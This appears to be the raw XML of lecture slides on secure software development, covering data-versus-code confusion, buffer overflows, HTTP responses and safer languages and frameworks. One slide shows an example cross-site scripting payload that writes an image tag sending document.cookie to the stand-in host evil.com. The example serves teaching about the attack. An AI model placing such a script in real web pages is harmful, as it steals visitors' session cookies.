        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24799776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B6ED91-5667-4AA7-85FF-E7B4E4F695A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2555631" y="1441938"/>
            <a:ext cx="7080738" cy="3974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Lesson 2</a:t>
            </a:r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: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Never mix code and data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6932548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87126-970A-410F-8209-CD1A9770F1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1788" y="1825625"/>
            <a:ext cx="5458012" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="241093">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef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&lt;html&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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41093">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef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&lt;head&gt;&lt;/head&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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41093">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef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&lt;body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="241093">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef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	&lt;p&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>This is my page.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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&lt;/p&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="241093">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef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	&lt;script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="241093">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef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dirty="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> front = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>‘&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000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Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>=\’http://evil.com/pic.jpg?’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="241093">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef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dirty="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> back = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>‘\’ /&gt;’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="241093">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef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dirty="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>document</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>(front + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> + back);    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="241093">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef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	&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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41093">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef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&lt;/body&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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41093">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef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&lt;/html&gt;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C9E0D1EC-19B7-4121-B267-44DFD42DF4BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="741081" y="4852894"/>
            <a:ext cx="4655671" cy="1757083"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -22117"/>
              <a:gd name="adj2" fmla="val -1058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Web pages mix data and code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Attacker injects “text” which is interpreted as code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9687AB-192B-49DD-8512-8805C3AC19EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9258574" y="365125"/>
            <a:ext cx="1256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Memory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F698D6-88FC-4F81-A19C-C49466D67562}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8567009" y="826790"/>
            <a:ext cx="0" cy="556305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1CA3F29-C992-4AAA-8C6A-3BFB06FF097C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11211377" y="826790"/>
            <a:ext cx="0" cy="556305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04201EA9-C2F7-4FEF-B3A8-0DD2B66EECE3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8623892" y="1255059"/>
            <a:ext cx="2504140" cy="70522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argv</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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90E103F-8FF8-45B5-8D0B-814650AF5F87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8623892" y="2035939"/>
            <a:ext cx="2504140" cy="40246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argc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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C572F4-913C-407F-BDD6-B4CA475EB598}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8623892" y="3521889"/>
            <a:ext cx="2504140" cy="286796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buffer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B35F2E5-08AA-4E22-801D-48DCB1288C4A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7861254" y="2232839"/>
            <a:ext cx="621041" cy="931710"/>
            <a:chOff x="7973123" y="2159723"/>
            <a:chExt cx="621041" cy="1345461"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Left Bracket 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C61483F-B8FB-41BF-922D-7659AE53BD2B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8414872" y="2547880"/>
              <a:ext cx="179292" cy="698382"/>
            </a:xfrm>
            <a:prstGeom prst="leftBracket">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="5715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2F1E635-244B-44D4-8266-7926F0316A51}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="16200000">
              <a:off x="7500447" y="2632399"/>
              <a:ext cx="13454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main()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FFB80AC-72E9-485F-89B6-84F933C17515}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7877104" y="3110809"/>
            <a:ext cx="605191" cy="3279040"/>
            <a:chOff x="7988973" y="2547879"/>
            <a:chExt cx="605191" cy="1209717"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Left Bracket 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{069BDC14-12A4-482C-B0DD-46CC5C7488B2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8414872" y="2547879"/>
              <a:ext cx="179292" cy="1209717"/>
            </a:xfrm>
            <a:prstGeom prst="leftBracket">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="5715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E1327EC-4347-4DC3-83E2-791EF7FD692B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="16200000">
              <a:off x="7886815" y="2778499"/>
              <a:ext cx="6044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print()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1D021716-18C1-45D1-B4DF-264AD599320B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8623892" y="2514057"/>
            <a:ext cx="2504140" cy="40246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IP = …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A2D9BC4-912F-4F8E-9C9A-D9F9F4786118}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8623892" y="3061224"/>
            <a:ext cx="2504140" cy="40246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IP = 7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34F96DD-7060-406C-9F6B-9BF4C1737955}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8624595" y="3521889"/>
            <a:ext cx="2502734" cy="78117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Malicious code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E19D449-34BA-4694-ACC4-1650CC1A2F0C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8630335" y="3058115"/>
            <a:ext cx="2502734" cy="40557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IP = 900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A4857722-6BA0-4F5C-84C0-8E4253CD6399}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11138105" y="1272987"/>
            <a:ext cx="874602" cy="69924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:1000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:996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7D38883C-40E6-44AE-B188-5869A98C9368}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11138105" y="2069979"/>
            <a:ext cx="874602" cy="3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:992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936671A8-7A95-481A-BDB4-4DD82664BC1F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11138105" y="2564309"/>
            <a:ext cx="874602" cy="3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:988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55F47291-8598-4DA2-A55A-A674D92EA3C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11138105" y="3074447"/>
            <a:ext cx="874602" cy="3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:984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243D56FF-EC62-4C05-BC98-2C6C9CCC56A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11138105" y="6057856"/>
            <a:ext cx="874602" cy="3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:856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592A9F5-3482-42B7-B989-5E59DDD97931}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8630335" y="4316193"/>
            <a:ext cx="2502734" cy="2073656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NOP sled</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Speech Bubble: Rectangle 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3468433A-8E31-4C8A-9F62-E5444830F52E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3563410" y="277166"/>
            <a:ext cx="4655671" cy="1757083"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 54520"/>
              <a:gd name="adj2" fmla="val 1570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Stack may mix data and code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Attacker injects “text” which is interpreted as code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="229413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8" grpId="0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B6ED91-5667-4AA7-85FF-E7B4E4F695A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2555631" y="1441938"/>
            <a:ext cx="7080738" cy="3974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Lesson 3</a:t>
            </a:r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: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Use the best tools at your disposal</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4476844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C9DFDAF-5BEB-4900-B5EE-67E5B085BB81}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3493828" y="2083558"/>
            <a:ext cx="0" cy="4640239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ACD054E-657B-4998-AA03-CB9AAF7E2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Response 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B24184-0038-4394-B534-60E0F5CE0B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2191" y="2429301"/>
            <a:ext cx="8397922" cy="42399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HTTP/1.1 200 OK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Content-Type: text/html; charset=UTF-8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Cache-Control: no-cache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Content-Encoding: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>gzip</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1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Content-Length 24824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Server: Apache 2.4.2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Date: Mon, 12 Feb 2018 22:44:23 GMT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Connection: keep-alive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1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[response content goes down here]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364D5B5-7563-4F9D-8D72-C13A561D6D8B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2383809"/>
            <a:ext cx="3484729" cy="3457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056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7584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112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2640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2000" dirty="0"/>
              <a:t>Version and status code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6F52C95-E8AC-4188-A9CC-A38FCE89AE6C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="2736376"/>
            <a:ext cx="3484729" cy="3457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056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7584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112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2640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2000" dirty="0"/>
              <a:t>File type of response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C37AEE1-94CB-49E5-B569-6E95DA5FA7AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-2" y="3088943"/>
            <a:ext cx="3484729" cy="3457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056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7584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112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2640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2000" dirty="0"/>
              <a:t>Cache the response?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0DEBC3B-0494-444E-A0BC-06344BEE90F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-3" y="3441510"/>
            <a:ext cx="3484729" cy="3457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056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7584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112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2640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2000" dirty="0"/>
              <a:t>Response is compress?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E4FF9BF-4EEE-4F91-BD56-10DB70285F27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-4" y="3794077"/>
            <a:ext cx="3484729" cy="3457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056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7584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112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2640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2000" dirty="0"/>
              <a:t>Length of response content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5812494-9C39-4B23-AD77-382C00E2875E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5" y="4146644"/>
            <a:ext cx="3484729" cy="3457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056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7584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112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2640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2000" dirty="0"/>
              <a:t>Info about the web server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CAF1458-FABD-4CAF-904E-A0FCEEF5B727}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4499211"/>
            <a:ext cx="3484729" cy="3457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056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7584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112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2640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endParaRPr lang="en-US" sz="200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950D18C-371A-4560-82E6-12E97E20B469}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-6" y="4851779"/>
            <a:ext cx="3484729" cy="3457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056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7584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112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2640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2000" dirty="0"/>
              <a:t>Close the connection?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CE0F1D-100E-49E2-96C1-824866552179}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="145576" y="2329218"/>
            <a:ext cx="6496334" cy="435094"/>
          </a:xfrm>
          <a:prstGeom prst="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AB14AC-FD10-4EFC-A6AF-CB83B213F857}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="145576" y="2673504"/>
            <a:ext cx="6496334" cy="435094"/>
          </a:xfrm>
          <a:prstGeom prst="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013513-1862-4720-8E43-57001A900DA0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="145576" y="2980257"/>
            <a:ext cx="6496334" cy="435094"/>
          </a:xfrm>
          <a:prstGeom prst="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2A0D402-6E2B-418F-B8FD-6148B88465BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="145576" y="3366697"/>
            <a:ext cx="8179558" cy="435094"/>
          </a:xfrm>
          <a:prstGeom prst="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D32AC3-104D-4952-ABBA-D821B9D30FD0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="145576" y="3691967"/>
            <a:ext cx="11900848" cy="435094"/>
          </a:xfrm>
          <a:prstGeom prst="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1381139-CC8D-435D-89CD-7BCC009F026C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="141027" y="4037071"/>
            <a:ext cx="7638197" cy="435094"/>
          </a:xfrm>
          <a:prstGeom prst="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8A1BFC4-7496-4DA3-93D2-A7C9910BE324}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3666699" y="4396462"/>
            <a:ext cx="4117074" cy="435094"/>
          </a:xfrm>
          <a:prstGeom prst="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68A5AE7-C233-44C3-BA3C-AA0BEABA0F9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="141027" y="4755604"/>
            <a:ext cx="7638197" cy="435094"/>
          </a:xfrm>
          <a:prstGeom prst="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DEC21E8-D380-43BA-A928-C1E4909C69E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3666699" y="5494857"/>
            <a:ext cx="4658435" cy="1228940"/>
          </a:xfrm>
          <a:prstGeom prst="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3214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CB0D00E-9820-4E2C-85E5-1DC609AE3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for More Secure Development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7A3CEA-5C41-465B-B029-2FD3BCDB7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80039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Choose a memory safe programming language</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C/C++ are not memory safe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Java and C# are somewhat better, but virtual machine may be vulnerable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Scripting languages offer more safety</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Rust is specifically designed for security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Choose well-maintained, security conscious frameworks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Wordpress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> are dumpster fires</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Django, Rails, and other modern frameworks offer:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Secure session management and password storage</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Object relational mappers (no need to write SQL)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Built-in output sanitization by default</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cross-Site Request Forgery (CSRF) mitigation by default</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
